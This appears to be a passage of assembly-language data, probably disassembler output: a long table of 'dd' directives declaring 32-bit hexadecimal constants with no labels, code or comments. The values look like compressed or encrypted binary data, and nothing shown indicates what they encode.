dd 0EB74AEDAh, 0EAF002C3h, 0EF32B17Ch, 0CA08E9E0h, 38784885h
dd 0AD07C30h, 6659D011h, 0AA4979A0h, 3E35F151h, 4C62E260h
dd 91C64B1Fh, 0F468D5C2h, 89107738h, 0C68FC43Ch, 297A2A1h
dd 1EC69604h, 36941BCh, 4D22824Ah, 0A282734Dh, 0A756CA12h
dd 0BEC28432h, 78A1AB97h, 0CE0A2734h, 0AC217ECDh, 0D0610CB5h
dd 272AABB9h, 381995FCh, 9DF71F97h, 0CBC6B014h, 0EFC0CB72h
dd 5AB504D0h, 44B572A8h, 3F5D1520h, 1681103h, 9C00C09h
dd 0F077C4DBh, 6E10BA4Dh, 7827F8C3h, 738E5C59h, 2CF9AE06h
dd 2150DC85h, 96427FC8h, 0AB19D2C6h, 0EA35AB0Ch, 9F94FD55h
dd 3E2300C1h, 0D5FA5232h, 1D6E8D50h, 8611F1AEh, 248ABBC2h
dd 0D257C05Fh, 94C1F35h, 200283BFh, 8D0494B8h, 7176A636h
dd 521A6A22h, 63E68836h, 0F95FB514h, 90393ADFh, 0A3730616h
dd 288ACDF1h, 0A4E59084h, 5A575C9Ch, 5536822Ch, 0C0876823h
dd 4AE15373h, 0B9C2A97Eh, 406EBB4Ah, 44F22D40h, 198A732Bh
dd 1D681742h, 36D06F60h, 0ED4091F5h, 950ED14h, 8E441036h
dd 68A72C96h, 7010701Dh, 0AEAAAA1Ch, 50F65207h, 0C98B0590h
dd 2F01C4B4h, 1AA4A414h, 38D053DFh, 8B61B414h, 9BA42D64h
dd 1B807815h, 92040B12h, 0A425F06Fh, 0B6C9B015h, 28A319D9h
dd 6372CDFAh, 0ED463A94h, 4312BE3Ch, 3BE89146h, 94A20298h
dd 1925805Dh, 568229CAh, 46BD4F1Bh, 0BDA02C45h, 3917022h
dd 44403D38h, 0EBA52958h, 337CFBE4h, 9EBDAA15h, 0D236FA89h
dd 0D2A049A6h, 538520C1h, 0ADD75150h, 0ABAD9BE0h, 0C828D4E3h
dd 5894FB2Ch, 83147C1Ch, 0A4A569C2h, 96E351FEh, 0F16983E0h
dd 5151369h, 6034D9A2h, 6896AC18h, 99186176h, 541EA2B4h
dd 30A2B9C3h, 283E2282h, 91149A51h, 0D234B96Ah, 91408Dh
dd 9DFE128Bh, 21C75199h, 700D0C34h, 47AEA82Ch, 5BF81AC7h
dd 0B5331985h, 0F8F1ABB3h, 0FFBFE04Eh, 7450B2B5h, 362E6147h
dd 0B42113C8h, 34A98D0h, 87A2408Ch, 0F782A1E3h, 7E163573h
dd 0A5C1E1F8h, 506BA738h, 2D7A14B5h, 0ED563F3Dh, 8438BEA1h
dd 3F2A531Eh, 0E40B1A94h, 0D353DD6Ch, 7A41E288h, 5998A582h
dd 721B7216h, 7D06861Eh, 9516D161h, 94332F9Ch, 4ED746CBh
dd 389B7119h, 1C1B62FFh, 0E743E9ACh, 892873E1h, 6242CBFFh
dd 599F342Ch, 30A3D72h, 0DFE64AD5h, 18C4CADFh, 9D1B5A9Fh
dd 5552D37Dh, 15CE6943h, 0FF5693BEh, 0D72196Ah, 3C6C2566h
dd 0B1932EF0h, 2361D214h, 0EF6551A0h, 2FB15016h, 3CDA6496h
dd 0BF02EB95h, 4006626Ch, 8FE48031h, 0C481E31h, 37D10987h
dd 1E1E08EEh, 0A414A01h, 0FAEF2C6Eh, 0A68FB754h, 9477B14Fh
dd 1471B875h, 0A6A0AA0h, 0DD9C88A8h, 8BE79DC2h, 0CE3FE5ADh
dd 35F5A8FAh, 0BC6146F1h, 0BBF115CBh, 174DB599h, 0AACE47A3h
dd 6E35376Ah, 0D509E90Eh, 15145892h, 0B508CC58h, 0A28C08B1h
dd 0EBF90E29h, 0E3862726h, 9466B60h, 5A6F0CD2h, 0FAD47842h
dd 99048AA8h, 0E4685DC3h, 885979C7h, 0F8ABE28Ch, 46CF1257h
dd 0E552D59Eh, 439E5CE9h, 5AD9EAC8h, 6739C928h, 0C68D98C1h
dd 57D65C62h, 28B82894h, 0FA219E41h, 0ADCD8627h, 0A1398DA0h
dd 3B16184Bh, 0BB06586Ah, 31480515h, 774CC929h, 0B4131F22h
dd 789048Bh, 0A9B96101h, 460C9701h, 4726B848h, 9995B2CFh
dd 0C6D5EF0Bh, 3C1FA8ACh, 94A7933Ch, 63F120D2h, 0FAD4DFE2h
dd 82801B9h, 767D8921h, 0F5EDE439h, 0A88712AFh, 24450463h
dd 34B8922Bh, 0A9FA398Bh, 0E60EB218h, 0EAE0CB06h, 6D027C46h
dd 44118563h, 0A3070CDAh, 183E44A0h, 860BA369h, 0EC010423h
dd 55851856h, 0C3EA720Eh, 0FCAF99A1h, 4F865590h, 1890714h
dd 0A96A1EA1h, 47768382h, 9A713946h, 0AA4628F1h, 0C97AF876h
dd 4211E2BFh, 3D137148h, 4804EAh, 1BC073C3h, 0CEA21CAEh
dd 2D627A73h, 22A83C75h, 17AD6879h, 0A65DF701h, 9CAD54C7h
dd 28A59863h, 0A18055A2h, 0F96A370h, 0E4C144ACh, 8771D899h
dd 82C8DF63h, 13857458h, 0FFE4A483h, 30049E7Eh, 8BEF80C2h
dd 330F9444h, 0A0416800h, 0DFB9C649h, 0FB7579BEh, 16E3104Ch
dd 0A9D6C6Eh, 9DB8FE05h, 80EB4311h, 0A3310108h, 302EE3E0h
dd 0EF043299h, 58889C56h, 3168C6EFh, 0AE3725EDh, 5BB9E007h
dd 843B6A0Fh, 0F095C5B2h, 602A4B9h, 99749749h, 9EC2FAA7h
dd 8C3F8697h, 80848144h, 414809D4h, 5442C924h, 0BAC60F2Ch
dd 2BA17511h, 809309Dh, 43B09375h, 2A09CA89h, 33E6CA01h
dd 3D702040h, 5C1F99F0h, 0DF4458D9h, 0E83763FEh, 78183CA5h
dd 3726D12h, 40C30A54h, 0D5B091FBh, 58524166h, 6FCCD37Dh
dd 3BD06ABh, 0ABDBB402h, 1A0C5C1Eh, 6040960Dh, 802A8E28h
dd 0C49E4672h, 0E0D53F90h, 4828252Bh, 6FF1B119h, 898C3B04h
dd 24410B54h, 0E74C58FAh, 0E7081CC5h, 0F889244Ah, 0CC9C634Bh
dd 0F40B6B2Eh, 65AD798Ch, 9A1E4862h, 39DA33FAh, 118C4CB8h
dd 0D62AA71Bh, 37858282h, 809A8B08h, 8201B77Fh, 2AC4196Ah
dd 72F965B5h, 0A331E4ECh, 1DAA4652h, 0AE37704Ch, 0E15907BFh
dd 0BE7A546Fh, 802499F4h, 0B7F6653Bh, 40EB540h, 4C580049h
dd 27610251h, 65FB53D0h, 8871A8C6h, 496097EBh, 0EC128730h
dd 420026A0h, 88E42CCAh, 250192D8h, 670EF305h, 0A25725ADh
dd 0A93B89E5h, 86ACBFA0h, 0A62D2832h, 7AE48356h, 407278C3h
dd 1E837682h, 1ADA36Eh, 40D41DBEh, 0A73B41E3h, 369C730Ah
dd 2E5E6ACFh, 78CEB635h, 3D28E216h, 446E7729h, 177A08D4h
dd 4D6CC405h, 92C4F16Eh, 26AB326Fh, 0DD187EA0h, 0A0295111h
dd 5438B582h, 0AF2C9678h, 114A98B1h, 0D9445586h, 66A1222Eh
dd 8C0A6A02h, 0ED1E3D15h, 10B0BCCCh, 228572B1h, 0F85E31CAh
dd 0D44F5AD1h, 8E95996Ah, 41DA16EDh, 7103E885h, 1437E994h
dd 0C7E47228h, 70825982h, 796083FFh, 0D22A5A14h, 0B9C58BACh
dd 8117004Fh, 0C443F19Bh, 0BAD5115Ch, 53C5261Eh, 1836F2B1h
dd 0B1C5D764h, 3856C52Eh, 5C6C07C6h, 763F0D9Fh, 1D54D4D3h
dd 2861D06h, 0E76D8A0Bh, 2293BA51h, 0B6B60C62h, 84B70BF6h
dd 0DAAD181Dh, 57ECEDB3h, 2BDED863h, 0A3C8C843h, 566BB885h
dd 0EFC7C36Bh, 0D5EF5D6h, 1D80348h, 0C10EF934h, 0DA041364h
dd 0D3F17E2Ah, 0E84321B4h, 904A0B62h, 4EAC7D72h, 0C60F8419h
dd 0E54492F5h, 8EFFC500h, 0E421A0CBh, 95320B7Bh, 15AB1880h
dd 0B3DABC94h, 7F958748h, 6990260Ch, 5000FF5Ch, 90960BA0h
dd 0C0938C41h, 1F4D69BCh, 600C1085h, 2E260D92h, 72A0933Eh
dd 0E67A8BFCh, 0EA6FA9A9h, 53802ADFh, 8833094Ah, 0DF7D4F93h
dd 4B3ECC6h, 2DE3BAB0h, 2B2A13B4h, 0F2156AAAh, 9F639EDFh
dd 566A0C41h, 0DBAF959Ch, 0A2102C58h, 7F9DB2D4h, 8EB62F3Ch
dd 0B774A08Bh, 9378D421h, 500A9B53h, 12AA289h, 0DDA24FA6h
dd 0E9B52FB0h, 74A9A8D2h, 0C5D30FDAh, 364CB6B4h, 0E99F7F8Dh
dd 0E352BF5h, 254436B6h, 7E2DAEDFh, 464D1EF2h, 0C9A15FFBh
dd 0B506E5D2h
dd 8B72200h, 8492B726h, 0E5541313h, 46A84A00h, 22802E18h
dd 185B6341h, 0B18291FDh, 5A262EFh, 88A19759h, 74F508D2h
dd 1C115130h, 0FA19312Ah, 7581C597h, 0DC0C5758h, 1E49668h
dd 7DABE1CEh, 0A63F1C9h, 0A904AE32h, 0CE49A622h, 6B7C9615h
dd 0D8125C2h, 0B5568D2Fh, 0CDA37B71h, 28644096h, 0F5C3DC55h
dd 610F583Ch, 28170FE8h, 58963F8Ch, 0B9FA6A0Ah, 2E18778h
dd 12022F34h, 8A0018DCh, 18F1D025h, 15BA8C70h, 8045AD27h
dd 0E74B023Ch, 0BFB668D6h, 0C071E24Fh, 0FC302998h, 2DAA4EC5h
dd 0E2D37C68h, 248808A9h, 0BF5EE0B5h, 8720DD8h, 0C221FED5h
dd 15A4AF03h, 95B483D2h, 0BEA20D8Bh, 6F30BAD1h, 0ABE8A54Ch
dd 0E0B048DCh, 2A6BBDA2h, 8BC69E45h, 9898086Dh, 563C2869h
dd 0B0496A44h, 33E62BD5h, 0C7FC9425h, 23562916h, 0B0A3B5D5h
dd 714828B1h, 2C5768A6h, 0A0B6C309h, 0C45201D2h, 0E8DBE3D0h
dd 481110D1h, 0B8A48A1Ah, 278A28Dh, 3163E91Fh, 0CC44A42Ch
dd 5DCD0DB9h, 819B352Ah, 98CC5A30h, 0F95EEB82h, 16223826h
dd 44D26A3Dh, 2B6E2890h, 6F968007h, 290ECD70h, 0DAC5C88Ch
dd 685933Eh, 0C6023536h, 0A7E84EA1h, 5DAA4AA1h, 144E658h
dd 0AA1AC0D5h, 0A8C353BAh, 0F4466199h, 0AE09F5C3h, 6A969FA8h
dd 0A1332051h, 8F162CA9h, 86995C41h, 0A91B8122h, 0D4F95714h
dd 64BE966Dh, 7AA1EAC3h, 88A2EDC2h, 63A0890Eh, 0FA4888A6h
dd 425C82A9h, 50A71D3Ah, 0C5EE1F7Ch, 0BF2DA657h, 6ED2568Bh
dd 69A91CBCh, 6EAB494Ch, 718E44E4h, 81A28D7Eh, 0B506EEF0h
dd 54A6A60Ch, 8A1F9960h, 21383907h, 44F51447h, 69856F46h
dd 90904005h, 0C28602h, 0A0796461h, 27780439h, 0E486F048h
dd 6190BCD0h, 9006052h, 188A0D21h, 89C411h, 4BAC37F3h
dd 0C702F848h, 0D749859Ch, 169CE6D8h, 61825759h, 1C466F8Ch
dd 342A18BEh, 544AEF90h, 0E02CC071h, 852AA168h, 80ED195h
dd 0FE597637h, 4110D54Dh, 0B8B38AD4h, 42B26AC2h, 0D30B7CB3h
dd 8B39CCA3h, 71A82A67h, 54E0B091h, 0CDE3BEC0h, 6A9B3D2Fh
dd 0BCCB3CF6h, 8B48D58Dh, 106A456Ch, 0E2EA96A8h, 0CA2F7A09h
dd 0F822DF42h, 1758151Eh, 0DA29E178h, 4A9D83Ch, 0F45310D1h
dd 0CCC1AC77h, 0B030D678h, 87A5E974h, 0B6B5F7D1h, 161547A4h
dd 5ED95837h, 1A3CEE9Eh, 0A0A08A66h, 0E8B46953h, 0F22C097Dh
dd 75049CACh, 70473759h, 5E044043h, 5ADA540Dh, 3FFFBC2Dh
dd 0EB5EAC1Fh, 0D12B809Eh, 68DF1614h, 0F748BB00h, 43380E5h
dd 2EB0019Ah, 0F6DE8865h, 879D1CDh, 82F0B09Ch, 0CD04D92h
dd 0BE2D5245h, 38909005h, 8EE1113h, 5734AC6Bh, 0B27C6514h
dd 7AE84E0Bh, 7040F503h, 89DC7EAh, 0B74E443Fh, 84294297h
dd 22404A54h, 0BA9048D4h, 0F1DE80BDh, 3FFA4409h, 0B4C21824h
dd 4CB32EB1h, 648D96BEh, 62BB1B89h, 1673257Ch, 188E6F5Ch
dd 10D77DD6h, 0C22ADA31h, 0A55F19ECh, 0B9C22EDEh, 373AEF8Bh
dd 2FF2144Dh, 0B3120868h, 1B422F22h, 1325E87h, 0D3D780AAh
dd 30608266h, 5A9C5DABh, 80924E07h, 0E2F9D563h, 0F08750BEh
dd 516641C5h, 0E37DC360h, 0D31C20A7h, 6DEDA80Fh, 7BAA99Fh
dd 369632F0h, 8095C472h, 8DC4C133h, 20E81ACh, 0FB833F6Eh
dd 7B8DC45h, 0C019C702h, 141F6064h, 3078B4E2h, 6480AE90h
dd 0A873D441h, 0EDE8A33Dh, 0B4504052h, 44CADC69h, 8066BDA0h
dd 5354F821h, 2ED1E72Dh, 29132CD9h, 15184465h, 0B550D7B3h
dd 0D3011246h, 54511A6Eh, 0A0A7D52h, 0C172A88Dh, 60E89B66h
dd 0A5AA9458h, 0A9AB2B11h, 243A1F5Bh, 54820F60h, 63292A7Dh
dd 0CE2F401h, 0B4895001h, 707A5A04h, 0D3AF0707h, 28A7434Ah
dd 153C591Eh, 8DA3506Ch, 0FF651758h, 982ED152h, 1D97E60Ch
dd 0A3D87B4Ah, 0C2895D25h, 0D01B4C4h, 0E013100Bh, 15BDF7h
dd 754277FFh, 0F8190DA8h, 5606AEC3h, 68A0C331h, 0DB11614h
dd 71156667h, 0D1254AB6h, 30E6B288h, 0D7160682h, 0A02A7553h
dd 0C3960B4Ch, 6AE4121h, 286DC638h, 6E448C2Bh, 1B8255B7h
dd 4C057701h, 449C8E1Fh, 3DCAAE82h, 15597294h, 0A288F282h
dd 186E4407h, 43B4FE29h, 2ABB1443h, 17BA89DFh, 62697490h
dd 7943D31Bh, 43908940h, 918FD492h, 1741AB22h, 0F265CBCh
dd 5C54DC1Ah, 0A6D1914Fh, 75221441h, 0B4AF0C61h, 12710DC3h
dd 5F0284B0h, 7430A890h, 0A511C029h, 225BB018h, 990358h
dd 0F025352Ah, 1483ACB5h, 0B36F8736h, 72CB2A12h, 211308h
dd 316BAE92h, 929AE5CCh, 0FCA2713h, 514D887Eh, 0B53BD0Dh
dd 48C45A78h, 406C52B0h, 2D008B01h, 0CF56C5FCh, 63BB858Dh
dd 4B53102h, 0AA0C1180h, 4A1C11ABh, 76E6237Eh, 0F2BE2953h
dd 0F9936E1Bh, 0AB15C388h, 85794183h, 494245DFh, 152ACA1Ch
dd 0B186597Bh, 0EF9FF893h, 0A1873738h, 5E4AA81h, 62AC4486h
dd 88C0410Dh, 28BC2E19h, 4A3E42F2h, 6317858Dh, 77677564h
dd 3BFACFB4h, 78EDB412h, 5D878439h, 0A6D94317h, 0FF0FAE04h
dd 81E383A6h, 1A6C1C23h, 240535EAh, 1F85703Dh, 94EC0192h
dd 0CBC497AAh, 0A490F9C7h, 0C1BBC86Ch, 8A2B93A4h, 85E25E13h
dd 807A7491h, 0A46185A2h, 4711BC3Eh, 0F1AF23C9h, 8454BC8h
dd 0D2040FB9h, 40062208h, 0B784DAF1h, 0ED7F65E2h, 37853728h
dd 0B14C4E77h, 0AB9208E3h, 0F2F10F05h, 7FFF8063h, 0C09C1A7Ah
dd 6292D318h, 0C03C1C08h, 6D9579C6h, 894C948Bh, 397987C2h
dd 28E8A0C4h, 4F36897Ah, 24BC292Bh, 181F3759h, 4F83B6Fh
dd 17086422h, 5F407CB6h, 0CCD1F1ACh, 2E01032Bh, 0ABF844Ah
dd 11784CC3h, 65C3426h, 0EB3F1DADh, 0FAD65F42h, 42CA133Fh
dd 13003CD5h, 54012531h, 0E338A921h, 9475E54Fh, 9DE3B69Eh
dd 42373285h, 45EA5B84h, 0B35D5E88h, 980B11C2h, 0D350A2B2h
dd 19397B84h, 26D78A71h, 0EAA49C0h, 5320D6F1h, 8DCA868Bh
dd 8C01A682h, 515CC9BDh, 25D64DAEh, 0DA4C009Fh, 24BC6B6h
dd 81E2F9AAh, 57080A9h, 25ECE201h, 20332E3Fh, 0E8237468h
dd 0B908D446h, 92277311h, 7D2BD60Eh, 1E03000Ch, 0E343127h
dd 8EF1487Dh, 0E4273E9Eh, 15241E3h, 0BE9C5A2Ah, 5AC0EF04h
dd 8AAC63Fh, 5FA39E9Eh, 6F6A2D48h, 4EE1571Dh, 0A5D6908Bh
dd 0E1B6AA77h, 9EBA05F3h, 17803D7Ah, 1A8D98F6h, 8B18D9B7h
dd 0E9980C05h, 0C9485EE1h, 87009381h, 0B53AB617h, 0C866A5A0h
dd 0C85D085Ch, 0CCE55E26h, 41852246h, 2EB026A0h, 0C258A45Ch
dd 65F970A1h, 0C1733130h, 758BE89Dh, 56201340h, 5F691C0Dh
dd 540B6389h, 5C2EBF1h, 8A601F6Ah, 31B00575h, 2B17D02Eh
dd 9A041F5Ch, 9A450816h, 0F97E101Dh, 55E197E0h, 3636058Bh
dd 0A360FB68h, 9BBC91BFh, 240FF31h, 0AC6D0CB7h, 42370790h
dd 0E0C8E77Fh, 4430FF44h, 5F951D42h, 70DD57B5h, 20BD96AFh
dd 50181812h, 5AF5D615h, 739AF825h, 0EB2E4CFBh, 5E0AEC22h
dd 0DC72031Ch, 0C116A600h, 14F83167h, 0DFE2B1C1h, 2E8BA715h
dd 60B893E6h, 0E75F839h, 0FEAB7F77h, 5A7897F6h, 0FF779717h
dd 1B2E864Eh, 0E43F595Bh, 0D622DEB1h, 6D5DF09Ch, 6ADD9758h
dd 0E726FCFDh, 583CB156h, 94579560h, 9E4CD5E2h, 0A820C1D6h
dd 82445424h, 7B2862CEh, 0FE6D1D1Ch, 0AF4A3CEh, 5BEE877Ch
dd 9A85A565h, 0FD6F65C2h, 64A4850Ah, 399A92FAh, 2A4FCFEDh
dd 22F0D02Fh, 0D2EDD303h, 66974E3Eh, 0F2365600h, 0CBA7F1A2h
dd 5DF41210h, 559F72BDh
dd 0EE8B432h, 0EABAE8F5h, 8A0C55CCh, 0B28BA11Ah, 0AA20217Ah
dd 14508613h, 0BB5A111h, 0BD42C145h, 72F76AEEh, 3E11D6BAh
dd 0A18FC08Ch, 0EA3D0BB4h, 34E8D546h, 0F28665D4h, 0E7B5EA95h
dd 0D445FD8Bh, 0D73B2C13h, 7C3200BBh, 0D210510Dh, 73517CADh
dd 999FA247h, 91443D7Bh, 22BD01EDh, 0C0DF0F8Ch, 75772746h
dd 92CD6200h, 9553E9A8h, 0E7103055h, 4CAD6DEAh, 14887454h
dd 8A6645ADh, 7851B2A6h, 0B1B97163h, 1F9543B0h, 0C6D5DF7Eh
dd 980A7DA7h, 332A065Dh, 7AEB803h, 7B743BC8h, 0C8C0A65Ah
dd 8B52B4D0h, 6374EEB3h, 4DF7B8D7h, 2763D59Ch, 5145F8B8h
dd 0E5D2BA80h, 0B9FFF007h, 0E849178Bh, 93D6307Eh, 216EEBAFh
dd 0FFF9AA82h, 0ABDA3D14h, 0F7C05A25h, 4DF8A9CDh, 5E95D165h
dd 20F4D4E4h, 0F83E6A8Bh, 99E8298Bh, 468D0A9h, 458F70DAh
dd 0ACF06831h, 728119CEh, 0AB48CBC9h, 6F940AA7h, 69B4131Ah
dd 0F229A05Eh, 0EAC2BFA8h, 0BA489C72h, 18B31908h, 0A18B5450h
dd 0B59972A4h, 0C0CB4ECDh, 55F1E4BBh, 9507534Bh, 790CA6A2h
dd 0D9421F51h, 0C23D6B33h, 0DD4E0C16h, 7CAA04BBh, 1481D22h
dd 2E910851h, 565EC5FEh, 0BC18AFF8h, 0AE181608h, 0F49988C7h
dd 0ED8E15CDh, 0B26FBC2Bh, 0CE1571D4h, 229548C6h, 8A5258ADh
dd 0F8AC6ABAh, 46D181C2h, 6AF6296Eh, 0A28EAD51h, 52902660h
dd 0FCF0CA76h, 0B6888053h, 9225167Fh, 0B94F7312h, 0A0A511C7h
dd 0FF695F5Eh, 2C26B32Dh, 18BEE3E9h, 3E88A5Bh, 841109CBh
dd 0F8A8FC15h, 0EA786D32h, 0CD850270h, 0E78FBAE3h, 23305CBFh
dd 9330704h, 7EFA3795h, 1AAC93F1h, 56098B45h, 50A395ABh
dd 84499591h, 926AC11Fh, 83EB9AB3h, 0CE25B082h, 3AA96802h
dd 6BE61C7Ah, 0E0BBFB11h, 2D867AE6h, 3D89DAF3h, 1F68E123h
dd 8561A441h, 0E8675199h, 158F81Ah, 255E5514h, 40AC0208h
dd 6FC5E931h, 8E519D9Ch, 2F9D1EAEh, 9CB0908Ch, 0C318455Dh
dd 0D2A512Ch, 0E16B0A0h, 0D934A8F7h, 0E9090EF2h, 54F80512h
dd 58BAFFDCh, 1754B4Ah, 308D0AA6h, 0B9E882EEh, 0E0EDC28Ah
dd 0D555CABCh, 0A16951A9h, 0D30B682Ah, 0CA625D39h, 626E4202h
dd 72024DF0h, 13B28AF5h, 5CAF2349h, 0F2BEED16h, 0D6DE867Bh
dd 0A1DBF636h, 0B2C147F4h, 0FAD682FCh, 0ADC1293Bh, 89B6E74h
dd 96471681h, 4CC93AAAh, 41FC1A06h, 14AD3B94h, 0B152F197h
dd 0C6D15DC5h, 0BA51EB17h, 2BE0A200h, 550C3C3Bh, 3009FEE0h
dd 0B5676CF3h, 7687384Eh, 37554670h, 0AE0A4713h, 8A46CC92h
dd 27E5FA36h, 0DB6BA79Dh, 54102E6Ah, 43A5156Bh, 0A3049C80h
dd 96172EA2h, 0E1768282h, 0AA31EC1Eh, 70F0DE45h, 0CC3058AFh
dd 0C32D7267h, 0A0E0070Eh, 5AD5049Ch, 0C615D6h, 54E2D11Fh
dd 1F36C0E3h, 1C44C396h, 0BA172C0Fh, 80C60AAh, 0BF626ADAh
dd 10A5B0Fh, 86B837C0h, 0FC17CD23h, 36E82968h, 3FA85140h
dd 1A3D5356h, 3A0E9288h, 0B7BA481h, 200D4631h, 895D8DCh
dd 4BAD6570h, 0F6E9DBE1h, 6574E0A5h, 39866C6h, 35760082h
dd 145BDCA2h, 5B42E002h, 26736216h, 0CC0216DBh, 6BAC1F85h
dd 69D0EE2Fh, 0CE211DCh, 3BCA1A13h, 1EDA4D4Ah, 0FA81C004h
dd 5401E401h, 9636FCB5h, 55608318h, 5A8E8B80h, 0FCD8367Ch
dd 0F823670h, 0EDD87614h, 3318F0EAh, 4FFC7007h, 0E828099Dh
dd 85E054BAh, 3A2804E2h, 0C0511467h, 61E93E41h, 40C29849h
dd 10A843A9h, 0D01AD502h, 0C80BA566h, 0FA00C0D9h, 1ADAD089h
dd 0E6D7EE2Fh, 73502933h, 76E99D07h, 80C87D25h, 3F9849AAh
dd 0BA6FB0EBh, 0C8A8F40Eh, 0A10AC0C8h, 65B58h, 9CD23E15h
dd 0E49E728Bh, 39A5AD3Ch, 4102570Fh, 65737DCCh, 8A8933D7h
dd 8E2E5BF2h, 0B3991654h, 0F3EE511Ah, 15540A6Bh, 468F035Ch
dd 5B64F298h, 0F35AA415h, 873C9E00h, 1E032C15h, 26DAA8Fh
dd 0B2E09C74h, 0F7089C12h, 22607658h, 9A89E8A7h, 5A80F830h
dd 0D4FA5E01h, 0A505F5Fh, 67C294FFh, 0A42901B5h, 0DD820368h
dd 994AD507h, 334A4AAAh, 90CD2E29h, 414410D6h, 68E6A445h
dd 0F32887B0h, 0A0BF3A1Eh, 0E80E6C7Dh, 325050Ch, 3868FBC8h
dd 0B5322338h, 0B68B1DAAh, 0A71A58FFh, 0ACD58F35h, 29ACC3ECh
dd 7C549559h, 189F13D4h, 0C372C772h, 0BA7794D5h, 0CF4677C3h
dd 0AAA11F2Ah, 2A4C37BDh, 0CF229788h, 0A941D0C4h, 9DC3A5BCh
dd 549481ABh, 15252110h, 0CA921624h, 66219DB8h, 313B389h
dd 2B781468h, 8CFD5DF2h, 5C3B17D1h, 1E69AB77h, 0C514AC71h
dd 21522668h, 0BF98E7AFh, 3AC03D13h, 8F3055DDh, 95D7138h
dd 12D559CBh, 6C2C543h, 4BD728BBh, 0CFE40F18h, 7590CA17h
dd 5A8DE23Fh, 0F0A832AFh, 6A81B499h, 77585A1Ch, 6A9B6773h
dd 0E2BB1534h, 6C29D559h, 2CBB6BAEh, 48ACCCFDh, 14F95459h
dd 550DAD7h, 20452D54h, 0C4451E01h, 508AB27Eh, 4356B5D3h
dd 6CDA9758h, 0C72DF341h, 0E221FB28h, 54D9A859h, 0C48770A4h
dd 69A1D9D4h, 0BFBE0558h, 65025596h, 0D307D468h, 6F791F85h
dd 1FE00829h, 0CC18F59Ch, 0C8937825h, 20B8C5CEh, 16413827h
dd 0B142D9E6h, 823F58A1h, 4A2003A7h, 5C176BE0h, 9DB4707Fh
dd 0A04971D0h, 5A2BD1F6h, 980B2FF7h, 9AC522FFh, 0DB6A294h
dd 0EB2314FBh, 0D72B3856h, 0C6AC0FADh, 84B017F8h, 0C4A35DC0h
dd 0EC08E8A2h, 62722B6Eh, 45E74714h, 55CDCF17h, 4518E284h
dd 4B4F64A4h, 43813602h, 0F07827FBh, 311091C0h, 9A2579E9h
dd 0FF7161C5h, 2478E8BFh, 0FA1995D2h, 1B506BD2h, 0D3B94DE5h
dd 455B9AF4h, 0ED25345h, 0BE2CDC5Dh, 4D1E28B7h, 0C648752Fh
dd 2F4D0B9Fh, 0B37CE00Fh, 4914AE8Fh, 81BBADCh, 0EE4A6044h
dd 5B433D41h, 0F72A6FDh, 9A7F1EDEh, 469FDEE1h, 2C3F1ED3h
dd 4DDE5CA1h, 0F89019BAh, 1157AB7h, 0CC79E0ECh, 641A754Bh
dd 0F02FDADFh, 2DF542C2h, 7468B051h, 190AC471h, 6CB6E3A0h
dd 7C03A82Eh, 0BE1B26FCh, 5EDC2198h, 4C5447CBh, 15178451h
dd 35725AF1h, 1574E768h, 4E1418B5h, 0DD7D2826h, 55A2F2D7h
dd 43B5FE01h, 0EBEA38B8h, 0E3C5A607h, 2EEAE2D6h, 88F3AA5h
dd 61A08925h, 50EC2B1h, 0A0D9E8A4h, 80E0B280h, 5720523h
dd 3C0ECAADh, 9D62D985h, 51A78C86h, 0E10FF3Eh, 0E320063Eh
dd 93A8574h, 0CA9EB898h, 12EB8C10h, 0AC12FD57h, 7FE4A77Dh
dd 7D86B2A1h, 0DB95D273h, 82A65D3Bh, 765834DBh, 0EEFC0D49h
dd 0A702629Dh, 1F8A6E9Ah, 0CF943DA2h, 155529BEh, 0ABE37349h
dd 1FA3F477h, 8A5A40ABh, 2F92BC5Eh, 35A665A2h, 2BC3A00Bh
dd 0CE7B8E10h, 0D8CBC87Bh, 0B6AC57ECh, 0E859C4F1h, 8AA22FDAh
dd 3559F263h, 0BC8E8BC6h, 25D3F267h, 0C51694E4h, 1B72F931h
dd 0C1DF1314h, 6EB3D524h, 0F5C7C84h, 0E94A7702h, 0BE5229F1h
dd 71C1B0EAh, 0CACB6421h, 0B171A2CDh, 0AA3E9177h, 59519A03h
dd 3A84260Dh, 0CD52FB1Ah, 692445D4h, 6C8DCBE4h, 0E44D9DCDh
dd 96D41D5Dh, 0E5AB1AA9h, 22CC2937h, 321644A6h, 307FFCCAh
dd 3F0FC6FCh, 0C23FDF04h, 34249F73h, 2A811D88h, 262FF89Eh
dd 74DE434Ah, 3B54FB75h, 79D6BA10h, 85007807h, 566D35F1h
dd 0A022A759h, 1759342h, 0FDC72BF7h, 0BE2F874Eh, 0B2C92098h
dd 178FAE06h, 832440A8h, 38550262h, 19D32EAAh, 82A0C9DFh
dd 44C35C07h, 29E7D07Dh, 9C378F0Fh, 0DB80F829h, 24D36F74h
dd 32FC5E57h, 0AA57982Dh, 0DAAA070Dh, 5D70EE90h, 3A80E0B7h
dd 9C303EB8h, 888A6D89h
dd 11753CEDh, 3218B4A0h, 2C795ACh, 921190E4h, 0D5B131E4h
dd 0D90C57A9h, 0F6E15117h, 7180882Ah, 986D6F37h, 0D319852h
dd 7C1FB3EEh, 3AE143D0h, 0EBE01A03h, 3D065D22h, 1485B10Dh
dd 299560D2h, 0E1B0D7E6h, 0EBE9F100h, 0F5519852h, 2C2735FDh
dd 2844EC30h, 0E25D92E9h, 0A830353Ah, 8C1877C6h, 0F07C30D9h
dd 37DFB37Fh, 0C3201045h, 5C27F5EAh, 64573771h, 2E069A8Bh
dd 5F1C1B47h, 8C02BC3Ch, 17FE06B9h, 2DA4D8DAh, 48C5B7C3h
dd 3339211h, 86289007h, 383E14BCh, 0F57DB876h, 3F8D02EAh
dd 2B8AF7E1h, 0CD8F95D2h, 0D73D8560h, 2A2C472Ch, 7D70DEB3h
dd 5F172A5Dh, 0F8E2BEC5h, 2433C3E0h, 8CC11560h, 0F1490ADFh
dd 0F2E02BF3h, 7F9CF799h, 0A2057F02h, 0BCF21FC5h, 0E4828583h
dd 24607C60h, 5D63607Ch, 1EBA248Bh, 148B9250h, 0FCC274D1h
dd 33C42106h, 0EB6D3380h, 0E85FAF57h, 6BA2B962h, 5EF3C9D1h
dd 0B276EE06h, 0FC1F3E32h, 9A6DDCBCh, 137B4152h, 92EA9454h
dd 0C1708941h, 5BFC7AF2h, 3BFDD698h, 22731C20h, 48654CFEh
dd 0C9871460h, 42E35F0Bh, 83B2E132h, 97DF566Ch, 8A3BA8Eh
dd 0DA708CD6h, 5C1D9229h, 7BE7D38h, 89CDEFF0h, 0CCE3B93Ah
